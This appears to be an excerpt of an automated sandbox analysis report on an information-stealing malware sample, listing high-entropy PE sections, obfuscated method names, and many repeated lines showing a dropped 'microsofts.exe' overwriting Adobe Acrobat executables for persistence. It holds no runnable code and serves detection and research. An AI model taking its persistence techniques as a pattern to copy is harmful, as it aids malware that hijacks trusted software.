Source: chrome_proxy.exe.4.dr	Static PE information: section name: .reloc entropy: 7.939829916797662
Source: FXSSVC.exe.4.dr	Static PE information: section name: .reloc entropy: 7.942280026799597
Source: jusched.exe.4.dr	Static PE information: section name: .reloc entropy: 7.93606148486302
Source: AppVClient.exe.4.dr	Static PE information: section name: .reloc entropy: 7.936534497052191
Source: elevation_service.exe.4.dr	Static PE information: section name: .reloc entropy: 7.943955306015417
Source: elevation_service.exe0.4.dr	Static PE information: section name: .reloc entropy: 7.945963164508881
Source: 117.0.5938.132_chrome_installer.exe.4.dr	Static PE information: section name: .reloc entropy: 7.93477726184914

Source: Native_Redline_BTC.exe.3.dr, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.svchost.exe.6800000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'vBXN2xV7mCTjW', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\76fb15a314ced2a4.bin

Drops executable to a common third party application directory

Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
